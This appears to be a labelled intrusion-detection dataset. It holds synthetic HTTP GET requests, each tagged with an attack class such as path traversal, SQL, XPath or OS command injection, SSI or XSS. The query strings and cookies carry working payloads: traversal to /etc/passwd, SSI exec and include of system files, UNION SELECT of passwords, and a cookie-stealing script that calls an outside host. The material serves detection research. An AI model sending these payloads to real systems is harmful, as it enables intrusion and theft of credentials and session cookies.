End - Id: 47409
Start - Id: 45605
class: PathTransversal
GET /osUOrn/aheTdyerheYet/e2EwI/y7wr5oZOf77/ywexacew4edscts7abe/P9RpasswdnF7fl.php?xoTX=ho0TRSr&eesormsO=40831&cyortnbtieo=lmlee+ign2oinputu&TscriptoZXpzAwU=f%3A%5C%5CWINNT%5C%5Cwin.ini&teceb8hai=879902&qt7=asse&teuio7a=485936954&logclat6tbicio=57961516&etcei7d00=sQpIJ5c6&nh1daeQ=n6i&.NrmlvLh5RSH=6esree HTTP/1.1
Host: www.tvorhp.fr
Connection: hs2m5
Accept: */*
Accept-Charset: iso-8859-8-i, x-mac-japanese, iso-8859-2, windows-1258;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 145.209.224.15
Cookie: hesorr3vi=nihi7iuej1strou
Cookie2: $Version="74"
Date: Sun, 28 Oct 07 07:13:17 GMT
ETag: "1uZHYBpjmXTTQQw"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Sun, 22 Jan 06 07:30:39 GMT
If-Unmodified-Since: Wed, 01 Mar 06 19:29:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Sep 08 01:32:14 CET
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: /aieinic.jsp
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/6.9 (Windows; U; Win 9x 9.8; sa-ii; rv:9.5.0) Gecko/02887708
UA-CPU: MIPS
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 413x730
Via: FTP/4.0 160.191.136.47, hg5mbt/2.5 www.dooIt.js, le1to/2.0 4.147.89.41
Transfer-Encoding: deflate
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 749320741
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45605
Start - Id: 49885
class: XPathInjection
GET /uynH9m6/tsipdicnm1awmalZu/2aEznrpennefn/7L3update6Zsboot.ininodeb2/iJQ-/nh5d/0Ry61X3gLBi4Tm/uC9Kj.9zytWKTD.wLcR/jsgtrYqee/JFBDA.png?hnsmmlTstvs=16015&ihbe6poa=92616075&@BrP7services8T9=7723++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++07050%3D HTTP/1.1
Host: 15.3.254.60:03
Connection: close
Accept: image/gif;q=0.0, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nten-saiw;q=0.8, q9h0o5-zhf2;q=0.0, Pfl-iecin1qf, lzlfjlin-rbumi;q=0.4, g4fa-epeaeD;q=0.7
Cache-Control: no-cache
Client-ip: 254.52.23.67
Cookie: ngRsyH0copyhfL=78631;rpYATh5e=5173524
Cookie2: $Version="80"
Date: Wed, 11 Nov 09 15:28:05 GMT
ETag: W/"79-wqobJXvLTgCDO1"
Expect: eIGeTy=oploiae;cire=cRuvr
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 27 May 07 24:30:31 GMT
If-Unmodified-Since: Wed, 06 Dec 06 06:29:44 UTC
If-Match: *
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 5727
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: http://AaTl.de/W5eO.php3
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 3.1; oo-Ad; rv:9.5.7) Gecko/33575746
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5492x304
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49885
Start - Id: 49481
class: XPathInjection
GET /insertzBVRgWF/6UIY@5U4FUVL.jpg?4URKWxt=soHo%3C&eaoptadenh6mue0=sRei&lsYDc0uDS=1%2Be3pnu&qrsr1etoaia=s%3Coehnren&oe49saah=828887&iH1e1p5rdpEm=%28i+++%3C+count%28te%2Fchild%3A%3Atext%28%29%29+++++and++++j++%3C+++++count%28t5%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++++%3C+count%28umTod%2Fchild%3A%3A*%29+++%29&urg1t=mlscripty+&lb=5708601 HTTP/1.0
Host: www.igebR.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 39.79.55.113
Cookie: 0s6r=0600;en8tNkmE=513868;NurieoutnIcl=yeMCNr3t4a;5u10hatena=tc;oao0OSw=14910;2d8aaneoado=919787
Cookie2: $Version="297"
Date: Sat, 24 Nov 07 06:20:13 GMT
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Thu, 25 Mar 04 09:08:43 CET
If-Match: "G6fSupc7IugrVgkr"
If-None-Match: *
If-Range: Sun, 14 Aug 05 24:47:56 GMT
Max-Forwards: 30
MIME-Version: 2.1
Pragma: r=ottEgr
Proxy-Authorization: Digest response="C5a0B7aEbcBBF1AB898B6beCd9d085aa"
Authorization: NTLM ZWk1cWNlc2V1ZGUxYTFlRXRhbFVvb2RhNHVkbmVzSmJ0M3Zsag==
Range: -012
Referer: /i27wcmtN/9ees/sydT/7iNt/bjoecd.mpg
TE: gzip
Trailer: If-None-Match
User-Agent: eHlOlwi/7.4.7
UA-CPU: Sparc
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: bia54t/7.1 www.feJLtpr6.jpeg
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49481
Start - Id: 43581
class: OsCommanding
GET /JSWd2/hWejEeLK2Nc12/tllASE.cfm?sAsfruantgos=re&eTsugdalrf6=d34ea&aiefssebnoEdtt=939097&hzi28ac0haaeNee=wie&etLrZg0cev=%5C%3B++++%5C%2Fbin%5C%2Fid++%3B&sohmtantAneaecr=3061&Tyhatua=rpasswdon&tlaeai2ledn=56409226&aEelgac0zmd=936834&cetuI=7206&-N.pklocation-n=as3efdeleteatz&34kuatoior1r9s=sluEh HTTP/1.0
Host: www.iyXfe.st:80
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity;q=0.7, deflate;q=0.7, deflate;q=0.6, compress
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 43.226.69.253
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="882"
Date: Wed, 05 Oct 05 12:46:55 CET
ETag: "z@VDwv-LBAonIc6"
Expect: 100-continue
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Tue, 23 Dec 08 18:03:06 CET
If-Unmodified-Since: Thu, 25 Dec 08 06:11:52 UTC
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 2382
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: NTLM YmlldGJMZTRhOWhhaTN0U3J4aURyaHJlZWFTM3lhSG9vdHR0ckFp
Range: 08647-744
Referer: /minfj/rcqenns/o1as2aqq/lih4yr/giugai.css
TE: trailers,trailers
Trailer: Host
User-Agent: umlnd/1.0
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: 6.0 www.toctee.tiff
Transfer-Encoding: compress
X-Forwarded-For: 171.91.103.182
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43581
Start - Id: 40026
class: SSI
GET /b3anLnt7e/oB7UkRtWslU.2/H3NvarD-3lsconnect8C/varRwYIwxcopyB/tTOg9-WdefkA/lPiaBndo/aHw7YpjGi9LfUf/ftrei1srfaueoefeZ191/tDsii6hae8le3tcg.asmx?SsiE=Pey&ooyfs5tn5cce=%3C%21+++%23%3C%21--++%23exec++cmd%3D%22id%22--%3E&Sbsx=4417&tR0=usT+S+%27knkmwSpe7j48&re=23 HTTP/1.1
Host: 228.62.164.180
Connection: eUhh
Accept: audio/*
Accept-Charset: x-mac-turkish;q=0.6, utf-7;q=0.2, x-mac-roman;q=0.5, ks_c_5601-1987, euc-jp;q=0.9
Accept-Encoding: gzip, compress
Accept-Language: wgettObB-dtuhixlt, yb-l9aOoe;q=0.8
Cache-Control: aomest='OltjcG'
Client-ip: 3.134.210.79
Cookie: tsNSc=28623;twohp=t']s&;14g4fhnXaA= wmleim aonift
Cookie2: $Version="0"
Date: Sun, 11 Jun 06 22:11:05 UTC
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Mon, 17 Nov 08 14:53:20 CET
If-Unmodified-Since: Fri, 11 May 07 09:56:50 GMT
If-Match: "j1LaojyNq3nlawlCSz-l"
If-None-Match: "dQmEz.uBsO8EW12"
If-Range: *
Max-Forwards: 4127
MIME-Version: 9.8
Pragma: 5=utjsec
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: NTLM Z2FvdWlhZ3VUcmNpQXNhZWVuYXNlYTBzZXRhbHJuZTNlZQ==
Range: 41683-1312,-3
Referer: http://www.eoomJr.st/as7dtrjb/semxn/Rhfo5/edyt/fdts.fgf
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: 83SZXcf.s http://www.faTunhDf.net
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: Nrnoel/4.3 www.oaaas.png:85930, 1.4 128.124.42.106:03, HTTP/9.5 www.H3sLt.gif
Transfer-Encoding: gzip
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40026
Start - Id: 46354
class: PathTransversal
GET /o3zCln3UIiV56uclUz/pVEwmhmdO8b@12/D1Q/lhqJd4v2DYEWMzGRp.php4?jsvyomtenoermn=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ZUAxEH=anamMhebj%3E%28copyrmardA7ey HTTP/1.1
Host: 247.203.108.71
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 246.165.10.252
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Sun, 02 May 04 20:02:52 GMT
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: esadlihc=tu29hp
From: dB62@isuoongs1.org
If-Modified-Since: Sun, 19 Sep 04 08:54:00 GMT
If-Unmodified-Since: Sun, 10 Feb 08 14:41:51 GMT
If-Match: "6qPo_nZ9NNVBUL38"
If-None-Match: *
If-Range: *
Max-Forwards: 804
MIME-Version: 1.9
Pragma: no-cache
Authorization: Digest response="B5d1b5Eee005A9e34C791549c23070cD"
Referer: http://www.pdsttdn.be/A2a2taua/repsrcr/o3e6lSln.dll
TE: chunked,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (X11; U; Open BSD i586 2.2; aa-es; rv:3.5.6) Gecko/80241705
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: 9.5 www.Imnpntk.gif, 8.7 www.ntsrgep.css, eodu/5.4 14.147.41.11
Transfer-Encoding: ewsMe
Upgrade: 8ez/8.7, Wuay/5.7
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46354
Start - Id: 41716
class: SqlInjection
GET /itho0G/or5Osnrocnzgo1et8Peb/z8/tZw9k1goOfqay/bEgFR-KlBwvgNnyIWNm/je6tt.sh?gop=%27+AND+++USER_NAME%28%29%3D%27pa&1ndk=nu9tnlastada+i&od=e3s4+rg%5Dnkoni&h4D=tLJPmop&mha6nl1f=eotegscriptsamom9eL&EoErTccs=sBy7&ysE1Sat=9enn7emoonooavtL6&ewiNae=iteTrpzs&HIittemadm4a8lp=47357185&eenyjwtaAesq=dD1z&yRneesDh=55258 HTTP/1.0
Host: www.ysos.ch:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: etmde-nt;q=0.2, aAtit-8, he-ojs;q=0.2
Cache-Control: max-stale
Client-ip: 60.67.60.69
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="446"
Date: Fri, 09 Sep 05 04:39:35 CET
ETag: W/"jExUKKMSBj7ISjAY"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Thu, 25 Sep 08 17:48:18 CET
If-Unmodified-Since: Thu, 24 Aug 06 06:05:57 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 6856
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=B6e30dfE
Authorization: Basic bjIyZWY6MnN1aQ==
Range: 018268-
Referer: /er04a/oouaarna/Nzi2eu6d/sdTaDutl/eertme9.css
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: 8gevermsiiadeil
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: HTTP/2.3 www.rGwphi.gif
Transfer-Encoding: gzip
Upgrade: aah/4.0
Warning: 604 www.Tomsiqie.jpeg "nobubdd9hsyeftiJigo" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41716
Start - Id: 46971
class: XSS
GET /aod/aPoabsCl-.bin?pFnm=egdtit1usupdatesOe%26e&empta4Sa7oWcnhs=sbmThrn1cnmi&zsnareSoo=wgetio&atlepistlseoo=8353524&uibtaindehayMt=s2iyiht0tiu&4Iy7k=se%2Buouerposition&CH4D52S3T8=Lya&aOsOmkAnz8ubn1=%3Cmeta++++http-equiv++++%3D%22++++refresh+++++%22+++++content%3D++++%22+++++0%3Burl%3Djavascript%3A+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.nt.com%2Fcgi-bin%2Fenol.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E&25hfAc=%5BsRsb7+y%22h%3Euc%22e%3Cj&cgmsmAiuIyuch=atto9&i7oxe67D=rnUax&sb8oqTac7ihtir=57153&yonae9=tdchdaQg%3BaB+aotn%26%24m HTTP/1.0
Host: 192.231.69.249:28
Connection: aeileml
Accept: application/*;q=0.3, video/*;q=0.1, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.7, compress;q=0.7, compress;q=0.6, compress;q=0.3
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: no-cache
Client-ip: 28.22.243.204
Cookie: uhs4et8nofl=504;autoexecmFmho=n2;odoywqe=;s5a?5;J6sDea=s@dwOtirftmp sour;_EidoTIo-=4rt;entnteabneto=07323071
Cookie2: $Version="577"
Date: Sat, 01 Jul 06 22:24:59 GMT
Expect: 100-continue
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 24 Jul 08 23:12:51 GMT
If-Match: "EbMTWcwjZ6s_Ybm5"
If-None-Match: *
Max-Forwards: 41
Pragma: oqol8=3nnh
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: Basic TWJFbGFzeWM6dHFzbzcxcw==
Range: -299,87-,670-62
Referer: http://www.oxuN.ch/lzeeei/Fae5m/atoehs.tiff
TE: trailers
User-Agent: o8bhgega (aJ@doc; dQZu3i2k; szCnNsHj)
UA-Disp: 2976,173,32
Via: 6.6 216.39.216.108, 9.2 134.189.248.198, FTP/7.7 www.2IateIem.html
Transfer-Encoding: deflate
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46971
Start - Id: 41294
class: SqlInjection
GET /ntusai/W8roeao/04rrpaee1See2N/ogshbiue3tfntsce/sT/2gWP22g/E9QY9o9.css? HTTP/1.1
Host: 7.21.204.110:377
Connection: 0lern
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: compress, gzip, compress
Accept-Language: 2crmyer-n, din-amT, dd0-edmau;q=0.4, teho-idnnBR3
Cache-Control: no-transform
Cookie: irrlt=niSgPreplacee dnrjh;rertdetnetbu7f='union  select PASSWORD  from    DBA_PASSWORD;--;oA7SSWXA_.p=0%mo-;onel=1R;ce
Cookie2: $Version="2"
Date: Wed, 12 Jul 06 14:26:29 UTC
ETag: "zwTjzXrm@Qd-.SIMEO"
Expect: 100-continue
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Mon, 07 Sep 09 04:10:52 UTC
If-Unmodified-Since: Thu, 19 Jan 06 23:35:38 GMT
If-Match: *
If-Range: Fri, 26 Jan 07 23:35:06 CET
Max-Forwards: 15
MIME-Version: 7.2
Pragma: no-cache
Authorization: 5hac keeogn=fmeoos
Referer: /kTuse/pLroe0/oewbne.fgf
TE: trailers
Trailer: Range
User-Agent: acgofithxS69t
UA-CPU: x86
UA-Disp: 807,7776,16
UA-OS: Mac OS X
UA-Color: color16
Via: 9.2 www.esneiea.htm, FTP/0.1 www.aninbcmC.png, 5.3 172.127.253.123:7245
Transfer-Encoding: identity
Upgrade: hnebp/4.7, dlb/9.5, 3Rmd/1.9, ocalhm/1.7, ejae/1.4
Warning: 984 www.egrfrn.jpg "npidetxrawrnkn7Oeerr" "Sun, 16 Sep 07 15:07:32 CET"
----: --------------------------------------------------

null

End - Id: 41294
Start - Id: 42635
class: SqlInjection
GET /nt5eAiset/Wv3K9t/eyEs/a7ds8LY4PvK14tSlJ-b/pitrllec/td/cNa4dwerctyssr/Qrt/j4FP-Tf24tfvbscript5.tiff?eREvihv5=gal&2rfRdonwHLdde=textn9g%29hNdchi&2edlldP4eed=replaceEgtv+h%7E%2Fstmpjis&neolT=bzeiermthrTci7R9Hd&0o6eoahtdko=lMg%3Dp%5Dwand+hAseiceleds&jXtOVFh8locationftpd=42975&e7sdt9rhtiY=sdgebfato&SYk_chYtA=%27%29++UNION++++ALL+SELECT+imedethn2a+++FROM+om++WHERE+++++%28++%27%27+%3D+%27&oenciSeloi3Bc=0608564566&m7haorpg=50319 HTTP/1.1
Host: www.enocY.com:58
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.0
Accept-Language: 8-8hcuwcs, aeuss0-ne9oi, ailn-hzLE;q=0.6
Cache-Control: no-cache
Client-ip: 107.228.29.96
Cookie: r02s=tDb@;ib5sdms8srser=linDuy ntaccept ;JBIy=nae;dm6=1
Cookie2: $Version="7"
Date: Fri, 08 Aug 08 09:29:51 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Thu, 09 Oct 08 18:24:40 GMT
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "GDnsZ-T4oXz66QlP"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 1
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: http://www.hamgt.cz/snqoE/oerne5he/aietesoD.pdf
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: txanu0sitcrt
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 7.2 211.85.27.237
Transfer-Encoding: compress
Upgrade: rBa/4.9
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42635
Start - Id: 45680
class: PathTransversal
GET /phpfEp/YBiframewopt0-NSxrO/aZ/bIcrsy4fnatkdutitth/dC4l51U.jpeg?messeaep=aGti7and&gzDwf0nrwrdaieu=xc%28&o0=8ssej5ikiieeDwtdh&OZN@SHOd=39334&Ogroup by2ddSJGpp=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fatte%2Fnt%2Falen%2Fro.asp&xi9@8=0 HTTP/1.1
Host: www.hidrx0do.fr:42685
Connection: keep-alive
Accept: audio/basic, audio/basic;q=0.9
Accept-Charset: windows-1253, isiri-3342
Accept-Encoding: compress;q=0.0, identity;q=0.0
Accept-Language: awi-uiofsEP;q=0.2, i5hr-qAt, eeheoyeo-oge, anksAt-Ia;q=0.9
Cache-Control: evasomac=S
Client-ip: 10.24.0.201
Cookie: tenoeso=8mbaeysgroup by nglsbo;aech6sehsytby=562909;iyuaAqahaEupbe=ttaoeS;axa=forbtserAtep
Cookie2: $Version="912"
Date: Sun, 01 Jun 08 23:20:16 CET
ETag: "oITd6gpcm.9INtKUBAA"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Sun, 02 Aug 09 20:39:00 CET
If-Unmodified-Since: Sat, 03 Sep 05 24:00:47 GMT
If-Match: *
If-None-Match: "QypQYa_6l6PryVQ8y"
If-Range: "t7pG45miEvj2R@-_i"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: srokA='u'
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: /atrtllim/hfex/1rttei/jEvdeki.css
TE: gzip;q=0.2,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: uintojn/4.2.2.6
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 488x430
Via: deee/4.1 www.9eohup.png
Transfer-Encoding: identity
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 242 47.27.151.65 "y4hi" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45680
Start - Id: 40481
class: SSI
GET /na8htn/aT8aa2niraewaalf/YedsOcnrijgw7itIhh/tvoHKm.mspx?gngituz=%3C%21--+++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.1
Host: www.fkmj.it:181
Connection: oopFeiuq
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: hnT-aywr;q=0.9, naqoc-evsois
Cache-Control: min-fresh=92
Client-ip: 73.14.167.166
Cookie: 299LlibI-E1=o oe;selretfdxeagonr=f8lsne-o;gti=tdeanu lr8n;ph4nayliec=tthrwtre0rtq
Cookie2: $Version="524"
Date: Mon, 08 Sep 08 21:14:00 CET
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Sat, 04 Sep 04 08:52:46 CET
If-Match: *
If-None-Match: "h4v86sB7siBekV4PXd"
If-Range: *
Max-Forwards: 67
MIME-Version: 7.1
Pragma: dcdBx4i='ywtion'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest username="1tfhert"
Range: -2,3-4,8136-
Referer: http://www.inyas.fr/evyuvr/egttmus/beensIl/lhinh/T5n5t.png
TE: chunked,gzip
Trailer: Host
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 6.2; em-04; rv:8.5.2) Gecko/92095046
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0287x026
Via: HTTP/2.6 www.tuaktt.js:5
Transfer-Encoding: deflate
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40481
Start - Id: 39771
class: SSI
GET /WkuPD/nihyaboetcti/LOmetatGA73/d..js?fotpgbTed7atasn=i-G&en=yses7ai&CbIIUstdinBd=3sj0l&ghmqlwraruw4inf=hturodl&iogif=lu&inLruR5@Y=tn&juvar2kNGAnodeKI=rw%40qlSy_vM&4VlO9ler76oSdZ=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.0
Host: www.irisoeas.ch
Connection: keep-alive
Accept: audio/basic;q=0.1, text/*;q=0.0, audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: eo7cSe-kidtm;q=0.2, ieeuutt-sacYBeh, Ecl-h, tpyltp-sctaobeo;q=0.2
Cache-Control: no-cache
Client-ip: 57.60.160.157
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="83"
Date: Wed, 08 Dec 04 18:28:22 GMT
ETag: W/"16rXq6CpTaDcd-iF"
Expect: 100-continue
From: 6Rvlor@tljncre.cz
If-Modified-Since: Fri, 08 Sep 06 13:53:33 GMT
If-Unmodified-Since: Sun, 19 Jun 05 24:51:32 UTC
If-Match: *
If-None-Match: "nRzVkoSLpeL56v1"
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: Digest nonce
Authorization: Basic ZTRoZzppb2RkYQ==
Range: 42-82,601-32,-86
Referer: /on7ec/tln2xs8h.mdb
TE: chunked,trailers
Trailer: Trailer
User-Agent: Mozilla/9.2 (Windows; U; WinNT 8.4; en-n0; rv:7.3.3) Gecko/53959486
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 357x4433
Via: 5.2 251.113.131.179, thcsex/4.8 67.143.79.15:071
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39771
Start - Id: 44144
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.pitxdS6hI.st:50052
Connection: keep-alive
Accept: application/*
Accept-Charset: iso-2022-jp
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="3"
Date: Wed, 26 Jul 06 20:18:02 UTC
ETag: W/"W7fa4Q-.MjhJ7B8G"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 30 May 09 18:59:20 CET
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
